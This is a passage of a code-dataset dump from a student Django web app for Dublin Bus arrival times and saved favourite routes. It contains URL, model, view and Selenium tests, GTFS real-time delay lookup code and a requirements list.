"content_id": "05d9beda42dbbd5ca50f2dbb71ecfb944bc23123", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2585, "license_type": "no_license", "max_line_length": 119, "num_lines": 74, "path": "/Dublin_Bus/tests/test_urls.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.test import SimpleTestCase\nfrom django.urls import reverse, resolve\nfrom Bus.views import index, fetch_arrivals, send_to_model, twitter\nfrom users.views import loginPage, registerPage, logoutUser, favourites, addFavourite, removeFavourite, renameFavourite\n\n\n# Test that basic URLS are functioning properly\nclass TestUrls(SimpleTestCase):\n\n # Test Homepage/Map URL\n def test_index(self):\n url = reverse('index')\n self.assertEquals(url, '/')\n self.assertEquals(resolve(url).func, index)\n\n # Test Twitter Page URL\n def test_twitter(self):\n url = reverse('twitter')\n self.assertEquals(url, '/twitter')\n self.assertEquals(resolve(url).func, twitter)\n\n # Test Real Time Arrivals URL \n def test_arrivals(self):\n url = reverse('arrivaltimes')\n self.assertEquals(url, '/fetch_arrivals/')\n self.assertEquals(resolve(url).func, fetch_arrivals)\n\n # Test Model URL \n def test_model(self):\n url = reverse('model')\n self.assertEquals(url, '/send_to_model')\n self.assertEquals(resolve(url).func, send_to_model)\n\n # Test Login Page URL \n def test_login(self):\n url = reverse('login')\n self.assertEquals(url, '/users/login')\n self.assertEquals(resolve(url).func, loginPage)\n\n # Test Register Page URL \n def test_register(self):\n url = reverse('register')\n self.assertEquals(url, '/users/register')\n self.assertEquals(resolve(url).func, registerPage)\n\n # Test Logout URL \n def test_logout(self):\n url = reverse('logout')\n self.assertEquals(url, '/users/logout')\n self.assertEquals(resolve(url).func, logoutUser)\n\n # Test Favourites Page URL\n def test_favourites(self):\n url = reverse('favourites')\n self.assertEquals(url, '/users/favourites')\n self.assertEquals(resolve(url).func, favourites)\n\n # Test Add Favourite URL\n def test_add_favourite(self):\n url = reverse('addFavourite')\n self.assertEquals(url, '/users/favourites/add')\n self.assertEquals(resolve(url).func, addFavourite)\n\n # Test Remove Favourite URL \n def test_remove_favourite(self):\n url = reverse('removeFavourite')\n self.assertEquals(url, '/users/favourites/remove')\n self.assertEquals(resolve(url).func, removeFavourite)\n\n # Test Rename Favourite URL \n def test_rename_favourite(self):\n url = reverse('renameFavourite')\n self.assertEquals(url, '/users/favourites/rename')\n self.assertEquals(resolve(url).func, renameFavourite)\n" }, { "alpha_fraction": 0.5614035129547119, "alphanum_fraction": 0.5719298124313354, "avg_line_length": 22.75, "blob_id": "6af36bcc4569dc7c1f4d5a0f24fb643b96ecee39", "content_id": "4d479eedb9da9af07afd62a501e8dc71b3a8b86a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 285, "license_type": "no_license", "max_line_length": 47, "num_lines": 12, "path": "/setup.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from setuptools import setup\n\nsetup(name=\"Dublin_Bus\",\n version=\"0.1\",\n description=\"Dublin Bus Web Application\",\n url=\"https://www.bustimate.com\",\n author=[\"Rachel Courtney, Andrew McClean, Amanda Hegarty\"],\n author_email=\"\",\n licence=\"GPL3\",\n packages=['config'],\n\n )\n" }, { "alpha_fraction": 0.5937984585762024, "alphanum_fraction": 0.5990697741508484, "avg_line_length": 36.5, "blob_id": "73dd0c67cf693713fd98bcc506b0610d45da2d64", "content_id": "4e77abc6a8519318f07a2356b744c71097b02836", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3225, "license_type": "no_license", "max_line_length": 112, "num_lines": 86, "path": "/Dublin_Bus/Bus/gtfsrealtime.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "import json\nfrom datetime import datetime, date, timedelta\nfrom django.conf import settings\nfrom .serializers import StopTimeSerializer\nfrom .models import Stop, Trip, Calendar, Route, StopTime, CalendarDate\n\n\ndef read_real_time():\n with open('json/real_time_data.json') as json_file:\n data = json.load(json_file)\n return data\n\n\ndef is_trip_affected(tripid, stopid):\n \"\"\"when a user clicks on a marker, sends 3 next timetabled arrivals according to GTFS and returns any delays\n reported by GTFS -R \"\"\"\n data = read_real_time()\n if 'entity' in data:\n for i in range(0, len(data['entity'])):\n if data['entity'][i][\"id\"] == tripid:\n stop_time_update = data['entity'][i][\"trip_update\"]['stop_time_update']\n for j in range(0, len(stop_time_update)):\n if stop_time_update[j]['stop_id'] == stopid:\n if 'arrival' in stop_time_update[j]:\n delay_in_seconds = stop_time_update[j]['arrival']['delay']\n return delay_in_seconds\n else:\n if 'departure' in stop_time_update[j]:\n delay_in_seconds = stop_time_update[j]['departure']['delay']\n return delay_in_seconds\n # if no delay or matching entry in GTFS -R, return 0\n return 0\n\n\ndef get_arrivals(stop_pk):\n \"\"\" returns next 3 arrivals for a given stop \"\"\"\n today_int = datetime.today().weekday()\n if today_int == 0:\n today = 'monday'\n elif today_int == 1:\n today = 'tuesday'\n elif today_int == 2:\n today = 'wednesday'\n elif today_int == 3:\n today = 'thursday'\n elif today_int == 4:\n today = 'friday'\n elif today_int == 5:\n today = 'saturday'\n else:\n today = 'sunday'\n\n results = {}\n\n today_date = date.today()\n today_str = today_date.strftime(\"%Y%m%d\")\n now = datetime.now().time()\n print(now)\n two_hours = datetime.now() + timedelta(hours=2)\n two_hours_from_now = two_hours.time()\n\n # This can probably be neater?\n # MySQL doesn't optimise nested queries very well, calling list() on queries forces execution\n\n stop_time_query = StopTime.objects.filter(stop_id=stop_pk, arrival_time__gt=now)\n calendar_date_query = CalendarDate.objects.only('service_id').filter(date=today_str)\n calendar_query = Calendar.objects.filter(start_date__lt=today_str, end_date__gt=today_str).filter(\n **{today: 1}).exclude(\n service_id__in=calendar_date_query)\n trip_query = Trip.objects.filter(stoptime__in=list(stop_time_query), service_id__in=list(calendar_query))\n stop_time = stop_time_query.filter(trip_id__in=list(trip_query)).order_by('arrival_time')\n\n delays = []\n trip = stop_time.values('trip_id')\n if len(trip) < 3:\n upper_range = len(trip)\n else:\n upper_range = 3\n for i in range(0, upper_range):\n delay = is_trip_affected(trip[i]['trip_id'], stop_pk)\n delays.append(delay)\n\n arrivals = StopTimeSerializer(stop_time[:upper_range], many=True)\n results['timetable'] = arrivals.data\n results['delays'] = delays\n return results\n" }, { "alpha_fraction": 0.5988840460777283, "alphanum_fraction": 0.6026038527488708, "avg_line_length": 30.7783260345459, "blob_id": "3ec8018b66e3259bf2b05e8bf5c165fba736a1cc", "content_id": "95cc30207b1073974adf20655e05102e0d0938c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6452, "license_type": "no_license", "max_line_length": 88, "num_lines": 203, "path": "/Dublin_Bus/functional_tests/tests_base.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom django.contrib.staticfiles.testing import StaticLiveServerTestCase\n\nfrom users.models import favourite\nfrom django.urls import reverse\nfrom django.contrib import auth\n\nUser = auth.get_user_model()\n\n\nclass BaseFunctionalTests(StaticLiveServerTestCase):\n def setUp(self):\n self.browser = webdriver.Chrome('functional_tests/chromedriver.exe')\n demo_user = User(username='myname', email='[email protected]')\n demo_user.is_staff = True\n demo_user.is_superuser = True\n self.demo_passwd = 'password'\n demo_user.set_password(self.demo_passwd)\n demo_user.save()\n self.demo_user = demo_user\n\n self.index_url = self.live_server_url + reverse(\"index\")\n self.login_url = self.live_server_url + reverse(\"login\")\n self.register_url = self.live_server_url + reverse(\"register\")\n self.favourite_url = self.live_server_url + reverse(\"favourites\")\n self.twitter_url = self.live_server_url + reverse(\"twitter\")\n\n def test_navbar_index(self):\n self.browser.get(self.login_url)\n wait = WebDriverWait(self.browser, 100)\n\n self.browser.find_element_by_id('menuButton').click()\n\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"indexLink\"))\n )\n finally:\n self.browser.find_element_by_id('indexLink').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.index_url\n )\n\n def test_navbar_twitter(self):\n self.browser.get(self.index_url)\n wait = WebDriverWait(self.browser, 100)\n\n self.browser.find_element_by_id('menuButton').click()\n\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"twitterLink\"))\n )\n finally:\n self.browser.find_element_by_id('twitterLink').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.twitter_url\n )\n\n def test_navbar_login(self):\n self.browser.get(self.index_url)\n wait = WebDriverWait(self.browser, 100)\n\n self.browser.find_element_by_id('menuButton').click()\n\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"loginLink\"))\n )\n finally:\n self.browser.find_element_by_id('loginLink').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.login_url\n )\n\n def test_navbar_register(self):\n self.browser.get(self.index_url)\n wait = WebDriverWait(self.browser, 100)\n\n self.browser.find_element_by_id('menuButton').click()\n\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"registerLink\"))\n )\n finally:\n self.browser.find_element_by_id('registerLink').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.register_url\n )\n\n def test_navbar_favourites(self):\n self.browser.get(self.index_url)\n wait = WebDriverWait(self.browser, 100)\n\n self.browser.find_element_by_id('menuButton').click()\n\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"favouritesLink\"))\n )\n finally:\n self.browser.find_element_by_id('favouritesLink').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.login_url + \"?next=/users/favourites\"\n )\n\n def test_navbar_favourites_loggedIn(self):\n self.browser.get(self.login_url)\n wait = WebDriverWait(self.browser, 100)\n\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n self.browser.find_element_by_id('menuButton').click()\n\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"favouritesLink\"))\n )\n finally:\n self.browser.find_element_by_id('favouritesLink').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.favourite_url\n )\n\n def test_navbar_logout(self):\n self.browser.get(self.login_url)\n wait = WebDriverWait(self.browser, 100)\n\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n self.browser.find_element_by_id('menuButton').click()\n\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"logoutLink\"))\n )\n finally:\n self.browser.find_element_by_id('logoutLink').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.login_url\n )\n\n self.assertTrue(\n self.browser.find_element_by_id('loginButton').is_displayed()\n #idExists(self, 'loginButton')\n )\n\n\n\n def test_loginButton(self):\n self.browser.get(self.index_url)\n\n self.browser.find_element_by_id('loginButton').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.login_url\n )\n\n def test_logoutButton(self):\n self.browser.get(self.login_url)\n wait = WebDriverWait(self.browser, 100)\n\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n self.browser.find_element_by_id('logoutButton').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.login_url\n )\n\n self.assertTrue(\n self.browser.find_element_by_id('loginButton').is_displayed()\n #idExists(self, 'loginButton')\n )\n\n" }, { "alpha_fraction": 0.5948766469955444, "alphanum_fraction": 0.6375711560249329, "avg_line_length": 31.9375, "blob_id": "50dfa2d74af7a0dd5650d48969ed95fc9ecf3493", "content_id": "dbc3ceeb8d700b5c234da2e84ec254c667b2d0c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1054, "license_type": "no_license", "max_line_length": 74, "num_lines": 32, "path": "/Dublin_Bus/tests/test_models.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.db.models.query_utils import select_related_descend\nfrom django.test.testcases import TestCase\nfrom users.models import favourite\nfrom Bus.models import Stop, Trip, Calendar, Route, StopTime, CalendarDate\nfrom django.contrib import auth\n\nUser = auth.get_user_model()\n\n\nclass TestModels(TestCase):\n def setUp(self):\n user1 = User(username='myname', email='[email protected]')\n user1.is_staff = True\n user1.is_superuser = True\n self.passwd = 'password'\n user1.set_password(self.passwd)\n user1.save()\n self.user1 = user1\n\n self.favourite1 = favourite.objects.create(\n user_id=self.user1.pk,\n origin_name='Shankill, Dublin, Ireland',\n origin_lat=53.2332663,\n origin_lon=-6.1237578,\n destin_name='East Wall, Dublin, Ireland',\n destin_lat=53.3543216,\n destin_lon=-6.2341133,\n stops=0\n )\n\n def test_favourite_given_name(self):\n self.assertEquals(self.favourite1.favourite_name, \"Saved Route\")\n" }, { "alpha_fraction": 0.603453516960144, "alphanum_fraction": 0.6225550174713135, "avg_line_length": 39.98538589477539, "blob_id": "ed7bb89eebb3601a40c9217ab4f84f036ee4286c", "content_id": "f8fd31049ce3cf9abedd5ce522595f7e5eb34c5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19632, "license_type": "no_license", "max_line_length": 108, "num_lines": 479, "path": "/Dublin_Bus/tests/test_views.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from datetime import date\nfrom django.http import response\nfrom django.test import TestCase, TransactionTestCase\nfrom django.urls import reverse\nfrom django.urls.base import resolve\nfrom django.contrib import auth\nfrom Bus.models import Stop, Trip, Calendar, Route, StopTime, CalendarDate\nfrom users.models import favourite\n\nimport json\n\nUser = auth.get_user_model()\n\n\nclass TestViews(TransactionTestCase):\n\n def setUp(self):\n # Set up User\n demo_user = User(username='myname', email='[email protected]')\n demo_user.is_staff = True\n demo_user.is_superuser = True\n self.demo_passwd = 'password'\n demo_user.set_password(self.demo_passwd)\n demo_user.save()\n self.demo_user = demo_user\n\n #create favourite\n demo_favourite = favourite(user_id = self.demo_user.pk,\n origin_name= 'Shankill, Dublin, Ireland',\n origin_lat = 53.2332663, \n origin_lon = -6.1237578, \n destin_name = 'East Wall, Dublin, Ireland', \n destin_lat = 53.3543216, \n destin_lon = -6.2341133,\n stops = 0\n )\n\n demo_favourite.save()\n self.demo_favourite = demo_favourite\n return super().setUp()\n\n \"\"\"========================= Testing existence of new demo objects =========================\"\"\"\n\n def test_demo_user_exists(self):\n self.assertEqual(User.objects.all().count(), 1)\n self.assertTrue(self.demo_user.check_password(self.demo_passwd))\n self.assertTrue(self.demo_user.is_staff)\n self.assertTrue(self.demo_user.is_superuser)\n self.assertEqual(self.demo_user.username, 'myname')\n self.assertEqual(self.demo_user.email, '[email protected]')\n\n # Check demo_favourite was created\n def test_demo_favourite(self):\n self.assertEqual(favourite.objects.all().count(), 1)\n self.assertEqual(self.demo_favourite.user, self.demo_user)\n self.assertEqual(self.demo_favourite.origin_name, 'Shankill, Dublin, Ireland')\n self.assertEqual(self.demo_favourite.origin_lat, 53.2332663)\n self.assertEqual(self.demo_favourite.origin_lon, -6.1237578)\n self.assertEqual(self.demo_favourite.destin_name, 'East Wall, Dublin, Ireland')\n self.assertEqual(self.demo_favourite.destin_lat, 53.3543216)\n self.assertEqual(self.demo_favourite.destin_lon, -6.2341133)\n self.assertEqual(self.demo_favourite.stops, 0)\n\n \"\"\"========================= Testing index view =========================\"\"\"\n\n def test_index_GET(self):\n response = self.client.get(reverse('index'))\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, 'Bus/index.html')\n\n def test_index_POST(self):\n response = self.client.post(reverse('index'))\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, 'Bus/index.html')\n\n \"\"\"========================= Testing twitter view =========================\"\"\"\n\n def test_twitter_GET(self):\n response = self.client.get(reverse('twitter'))\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, 'Bus/twitter.html')\n\n \"\"\"========================= Testing fetch_arrivals view =========================\"\"\"\n\n def test_arrivalTimes_GET(self):\n response = self.client.get(reverse('arrivaltimes'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('index'))\n\n \"\"\"========================= Testing send_to_model view =========================\"\"\"\n\n def test_model_GET(self):\n response = self.client.get(reverse('model'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('index'))\n\n\n\n \"\"\"========================= Testing registerPage view =========================\"\"\"\n\n def test_register_GET(self):\n response = self.client.get(reverse('register'))\n\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, 'users/register.html')\n\n def test_register_loggedin_GET(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n response = self.client.get(reverse('register'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('index'))\n\n # Check if a new user can be registered\n def test_register_user(self):\n new_user = {\n 'username': 'newguy',\n 'email': '[email protected]',\n 'password1': 'testing1234',\n 'password2': 'testing1234'\n }\n response = self.client.post(reverse('register'), new_user, follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n # check redirected to login page\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('login'))\n\n # Check new user is created\n self.assertEqual(User.objects.all().count(), 2)\n\n # Check new account message\n messages = list(response.context['messages'])\n self.assertEqual(len(messages), 1)\n self.assertEqual(str(messages[0]), 'Account created for ' + new_user['username'] + '.')\n\n # Check invalid user inputs fails to register new user\n def test_register_fail(self):\n invalid_user = {\n 'username': 'myname',\n 'email': '[email protected]',\n 'password1': 'testing1234',\n 'password2': 'password9876'\n }\n response = self.client.post(reverse('register'), invalid_user, follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n # Check that you are redirected back to register page\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('register'))\n\n # Check that a new user is not created\n self.assertEqual(User.objects.all().count(), 1)\n\n # Check that error messages exist\n messages = list(response.context['messages'])\n self.assertTrue(len(messages) > 0)\n\n \"\"\"========================= Testing loginPage view =========================\"\"\"\n\n def test_login_GET(self):\n response = self.client.get(reverse('login'))\n\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, 'users/login.html')\n\n def test_login_loggedin_GET(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n response = self.client.get(reverse('login'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('index'))\n\n def test_login_user(self):\n login_details = {\n \"username\": self.demo_user.username,\n \"password\": self.demo_passwd\n }\n response = self.client.post(reverse('login'), login_details, follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n # Check successful redirect\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('index'))\n\n # check user is now logged in\n user = auth.get_user(self.client)\n assert user.is_authenticated\n\n # Check failed login attempt\n def test_login_fail(self):\n login_details = {\n \"username\": self.demo_user.username,\n \"password\": \"wrong password\"\n }\n response = self.client.post(reverse('login'), login_details, follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n # redirected back to login\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('login'))\n\n # Check that error messages exist\n messages = list(response.context['messages'])\n self.assertTrue(len(messages) > 0)\n\n # check user is not logged in\n user = auth.get_user(self.client)\n assert not user.is_authenticated\n\n \"\"\"========================= Testing logoutUser view =========================\"\"\"\n\n def test_logout_GET(self):\n response = self.client.get(reverse('logout'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('login'))\n\n def test_logout(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n response = self.client.get(reverse('logout'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('login'))\n\n # check user is now logged out\n user = auth.get_user(self.client)\n assert not user.is_authenticated\n\n \"\"\"========================= Testing favourites view =========================\"\"\"\n\n def test_favourites_GET(self):\n response = self.client.get(reverse('favourites'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('login'))\n\n def test_favourites_loggedin_GET(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n response = self.client.get(reverse('favourites'))\n\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, 'users/favourites.html')\n\n \"\"\"========================= Testing addFavourites view =========================\"\"\"\n\n def test_addFavourite_GET(self):\n response = self.client.get(reverse('addFavourite'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('login'))\n\n def test_addFavourite_loggedin_GET(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n response = self.client.get(reverse('addFavourite'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('index'))\n\n # Adding a Favourite\n def test_addFavourite(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n new_favourite = {\n 'user': self.demo_user.pk,\n 'origin_name': 'Dorset Street Lower, stop 14',\n 'origin_lat': 53.358531237878196,\n 'origin_lon': -6.2627765057086595,\n 'destin_name': 'Parnell Square West, stop 3',\n 'destin_lat': 53.352308551434895,\n 'destin_lon': -6.26381074216821,\n 'stops': 1\n }\n response = self.client.post(reverse('addFavourite'), json.dumps(new_favourite), content_type=\"json\")\n data = json.loads(response.content)\n self.assertEquals(data['success'], True)\n self.assertEquals(data['result'], \"Favourite added.\")\n\n # Check new favourite details are correct\n data['favourite'].pop('id')\n data['favourite'].pop('favourite_name')\n self.assertEquals(data['favourite'], new_favourite)\n\n # Check new favourite is created\n self.assertEqual(favourite.objects.all().count(), 2)\n\n def test_addFavourite_nonexistent_user(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n bad_favourite = {\n 'user': -10,\n 'origin_name': 'Dorset Street Lower, stop 14',\n 'origin_lat': 53.358531237878196,\n 'origin_lon': -6.2627765057086595,\n 'destin_name': 'Parnell Square West, stop 3',\n 'destin_lat': 53.352308551434895,\n 'destin_lon': -6.26381074216821,\n 'stops': 1\n }\n response = self.client.post(reverse('addFavourite'), json.dumps(bad_favourite), content_type=\"json\")\n data = json.loads(response.content)\n\n # Check error message\n self.assertEquals(data['success'], False)\n self.assertEquals(data['result'], \"ERROR unable to save new favourite.\")\n\n # Check new favourite is not created\n self.assertEqual(favourite.objects.all().count(), 1)\n\n def test_addFavourite_wrongFormat(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n bad_favourite = {\n \"username\": self.demo_user.username,\n \"password\": \"wrong password\"\n }\n response = self.client.post(reverse('addFavourite'), json.dumps(bad_favourite), content_type=\"json\")\n data = json.loads(response.content)\n\n # Check error message\n self.assertEquals(data['success'], False)\n self.assertEquals(data['result'], \"ERROR unable to save new favourite.\")\n\n # Check new favourite is not created\n self.assertEqual(favourite.objects.all().count(), 1)\n\n def test_addFavourite_notJson(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n bad_favourite = {\n 'user': self.demo_user.pk,\n 'origin_name': 'Dorset Street Lower, stop 14',\n 'origin_lat': 53.358531237878196,\n 'origin_lon': -6.2627765057086595,\n 'destin_name': 'Parnell Square West, stop 3',\n 'destin_lat': 53.352308551434895,\n 'destin_lon': -6.26381074216821,\n 'stops': 1\n }\n response = self.client.post(reverse('addFavourite'), bad_favourite)\n data = json.loads(response.content)\n\n # Check error message\n self.assertEquals(data['success'], False)\n self.assertEquals(data['result'], \"ERROR input not in JSON format.\")\n\n # Check new favourite is not created\n self.assertEqual(favourite.objects.all().count(), 1)\n\n def test_addFavourite_duplicate(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n bad_favourite = {\n 'user': self.demo_user.pk,\n 'origin_name': self.demo_favourite.origin_name,\n 'origin_lat': self.demo_favourite.origin_lat,\n 'origin_lon': self.demo_favourite.origin_lon,\n 'destin_name': self.demo_favourite.destin_name,\n 'destin_lat': self.demo_favourite.destin_lat,\n 'destin_lon': self.demo_favourite.destin_lon,\n 'stops': self.demo_favourite.stops\n }\n response = self.client.post(reverse('addFavourite'), json.dumps(bad_favourite), content_type=\"json\")\n data = json.loads(response.content)\n\n # Check error message\n self.assertEquals(data['success'], False)\n self.assertEquals(data['result'], \"ERROR Duplicate favourite already exists.\")\n\n # Check new favourite is not created\n self.assertEqual(favourite.objects.all().count(), 1)\n\n \"\"\"========================= Testing removeFavourites view =========================\"\"\"\n\n def test_removeFavourite_GET(self):\n response = self.client.get(reverse('removeFavourite'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('login'))\n\n def test_removeFavourite_loggedin_GET(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n response = self.client.get(reverse('removeFavourite'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('index'))\n\n def test_removeFavourite(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n data = {'id': self.demo_favourite.pk}\n response = self.client.post(reverse('removeFavourite'), json.dumps(data), content_type=\"json\")\n data = json.loads(response.content)\n\n self.assertEquals(data['success'], True)\n self.assertEquals(data['result'], \"Favourite dropped.\")\n\n self.assertEqual(favourite.objects.all().count(), 0)\n\n def test_removeFavourite_fail(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n data = {'id': -10}\n response = self.client.post(reverse('removeFavourite'), json.dumps(data), content_type=\"json\")\n data = json.loads(response.content)\n\n self.assertEquals(data['success'], False)\n self.assertEquals(data['result'], \"ERROR could not delete.\")\n self.assertEqual(favourite.objects.all().count(), 1)\n\n def test_removeFavourite_wrongFormat(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n data = {'testkey': \"testvalue\"}\n response = self.client.post(reverse('removeFavourite'), json.dumps(data), content_type=\"json\")\n data = json.loads(response.content)\n\n self.assertEquals(data['success'], False)\n self.assertEquals(data['result'], \"ERROR could not delete.\")\n self.assertEqual(favourite.objects.all().count(), 1)\n\n \"\"\"========================= Testing renameFavourites view =========================\"\"\"\n\n # Not logged in GET\n def test_renameFavourite_GET(self):\n response = self.client.get(reverse('renameFavourite'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('login'))\n\n # Logged in Get\n\n def test_renameFavourite_loggedin_GET(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n response = self.client.get(reverse('renameFavourite'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('index'))\n\n def test_renameFavourite(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n data = {\n 'id': self.demo_favourite.pk,\n 'new_name': 'New_Name'\n }\n response = self.client.post(reverse('renameFavourite'), json.dumps(data), content_type=\"json\")\n data = json.loads(response.content)\n\n self.assertEquals(data['success'], True)\n self.assertEquals(data['result'], \"Rename successful.\")\n self.assertEquals(data['name'], 'New_Name')\n\n def test_renameFavourite_fail(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n data = {\n 'id': -10,\n 'new_name': 'New_Name'\n }\n response = self.client.post(reverse('renameFavourite'), json.dumps(data), content_type=\"json\")\n data = json.loads(response.content)\n\n self.assertEquals(data['success'], False)\n self.assertEquals(data['result'], \"ERROR could not rename.\")\n\n def test_renameFavourite_wrongFormat(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n data = {'testkey': \"testvalue\"}\n response = self.client.post(reverse('renameFavourite'), json.dumps(data), content_type=\"json\")\n data = json.loads(response.content)\n\n self.assertEquals(data['success'], False)\n self.assertEquals(data['result'], \"ERROR could not rename.\")\n" }, { "alpha_fraction": 0.5199999809265137, "alphanum_fraction": 0.7163636088371277, "avg_line_length": 17.399999618530273, "blob_id": "da3da15eae01316ae11d07ffd9a49b7ac417e64a", "content_id": "bd3e7ef255bbeaa71c3776090e1e912c7e559feb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 275, "license_type": "no_license", "max_line_length": 27, "num_lines": 15, "path": "/requirements.txt", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "PyMySQL==1.0.2\nholidays==0.11.1\nxgboost~=1.3.3\nrequests==2.25.1\npandas~=1.2.5\nDjango==3.2.5\nnumpy~=1.20.2\nscikit_learn==0.24.2\ndjangorestframework==3.12.4\ndjango-debug-toolbar==3.2.1\nsetuptools~=52.0.0\nscikit-learn~=0.24.2\ndjango-environ==0.4.5\ndateparser==1.0.0\npytz==2021.1" }, { "alpha_fraction": 0.5127931833267212, "alphanum_fraction": 0.5634812712669373, "avg_line_length": 58.298851013183594, "blob_id": "3aa7d1d20bd220ea1688ad1f0795a867de4d5704", "content_id": "e40d02c4ae391d65e781723430419acf3c0e4c49", "detected_licenses": [], "is_generated": false, 